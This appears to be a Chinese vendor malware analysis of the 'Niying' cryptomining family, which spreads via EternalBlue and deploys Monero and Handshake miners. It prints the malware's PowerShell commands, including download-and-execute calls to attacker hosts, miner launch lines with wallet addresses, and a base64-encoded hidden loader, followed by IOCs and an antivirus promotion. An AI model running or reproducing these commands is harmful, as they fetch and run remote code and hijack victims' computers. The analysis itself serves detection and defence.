客服热线
186-8811-5347、186-7086-0265
官方邮箱
contactus@mingting.cn
添加微信
立即线上沟通
客服微信
详情请咨询客服
客服热线
186-8811-5347、186-7086-0265
官方邮箱
contactus@mingting.cn
2020-03-20 来源:安全豹作者:安全豹
近期,金山毒霸安全团队再次捕获到“匿影”挖矿病毒,此病毒利用白加黑手法,通过NSA泄露工具包,永恒之蓝等漏洞进行横向传播,执行powershell脚本进行挖矿,感染传播,并且释放驱动对抗杀软。此病毒主要挖门罗币和Handshake(hns),通过f2pool矿池进行挖矿。
门罗币向来是挖矿病毒的不二之选,因为其无法被追踪,隐匿的特性,当然还有其挖矿算法支持cpu,比较“亲民”,只要是电脑就可以进行cpu挖矿,而且其价格可观。当然病毒作者选HNS的道理也大同小异,隐匿,价格,“亲民”,当然能用GPU对病毒来说是更优的选择,毕竟来钱快嘛。
技术分析
“匿影”病毒家族,大部分恶意模块均采用VMP保护,包括驱动对抗程序,为提高分析的成本,增加分析难度。而且恶意病毒的下载传播的服务器空间,均使用三方服务、网盘、图床,很难捕捉其真实地址。
病毒执行流程图
计划任务执行Powershell恶意脚本
中病毒计算机计划任务被添加自动运行恶意Powershell脚本
IEX((new-objectnet.webclient).downloadstring('http://cs.sslsngyl90.com'))
(new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299',
'C:\ProgramData\WinRing0x64.sys')(new-object System.Net.WebClient)
.DownloadFile( 'https://img.vim-cn.com/fd/31611086fb633acbe818d26f0dc710bb8e5350',
'C:\ProgramData\officekms.exe')Start-Process -FilePath C:\ProgramData\officekms.exe '-o xmr.f2pool.com:13531 -u
47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b -p x -k'
文件名 | 功能 |
Officekms.exe | 挖矿程序 |
WinRing0x64.sys | CPU信息检出 |
Gtt.exe | 挖矿,驱动保护 |
Go.exe | 挖矿,驱动保护 |
Nb.exe | 挖矿程序 |
Office.exe | 横向传播,漏洞利用 |
gtt.exe
C:\ProgramData\officekms.exe -o xmr.f2pool.com:13531 -u
43uhqNUnb RnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1 zmLSZ27mWMzU9k7YMGmGD.xx -p x -k
C:\Users\Public\MicrosftEdgeCP.exe -a hns -o stratum+tcp://hns.f2pool.com:6000 -u
hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw.019
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -N onI -W Hidden -ep Bypass -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEA
ZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB4AHgALgBlAG0AYQBpAGwAbQBpAGMAbwBwAC4AYwBsAHUAYgAnACkAKQA=
office.exe
如果没有杀软存在,则进行感染传播
挖矿信息
门罗币
47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b
43BxCW7rEQBUtDudnUG1pc4sY9wvwaCCYh71wk8Lx9Vq5PtVMneSDp4fbh8HvtF4JyPtXcBGbW2FWN21b5MhZpN2REofAcy
44ACdsQgNRRBLmLQAEvkVoCYAVmSpy2XsQvdvS4Srnbwf9tzrbMGEjigXbDCi8iT2LQznYV2DAzgCR6K5Y6vBth84oErPyg
43uhqNUnbRnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1zmLSZ27mWMzU9k7YMGmGD
可以通过以下链接查询https://www.f2pool.com/xmr/addr
Handshake
hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw
https://www.f2pool.com/hns/hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw
以下大概一个月的收益
总结:
可见挖矿病毒的收益还是很高的,当然这只是“借你之手”的获利,病毒在挖矿的时候会导致计算机卡顿,运行其它软件速度变慢,如果你有类似症状的时候,要想想是不是中了挖矿病毒了,及时安装金山毒霸扫描查杀,以免沦为他人的“工具”。
此病毒是通过BT下载器,激活工具等等免费破解工具进行的传播,友情提示,大家下载软件,尽量选择官方下载,第三方下载很有可能存在病毒捆绑,或者安装金山毒霸,即便不小心下载了恶意捆绑软件也可以及时查漏补缺,及时为你拦截相关病毒。
毒霸很好地支持计划任务,powershell,等关键可疑行为的查杀拦截
IOC
MD5:
974b7dd2e5f32297ac498d4b4816014a
95dd28e23472e0f2c561b0168e4d4de3
ca8ab64cda1205f0993a84bc76ad894a
124d75d7214a16635828982c6c24b8d2
39e5b7e7a52c4f6f86f086298950c6b8
0c0195c48b6b8582fa6f6373032118da
URL:
hxxp://cpu/sslsngyl90[.]com/vip.txt
hxxp://cpu.sslsngyl90[.]com/vip.txt
hxxps://img.vim-cn[.]com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299
hxxps://img.vim-cn[.]com/fd/31611086fb633acbe818d26f0dc710bb8e5350
hxxps://img.vim-cn[.]com/c9/b3a8ada87d992f7ef6fe68b6ecbadc339c71a1
hxxps://img.vim-cn[.]com/82/651423b4a6a5fb251b87ebec0f44d1cd862c21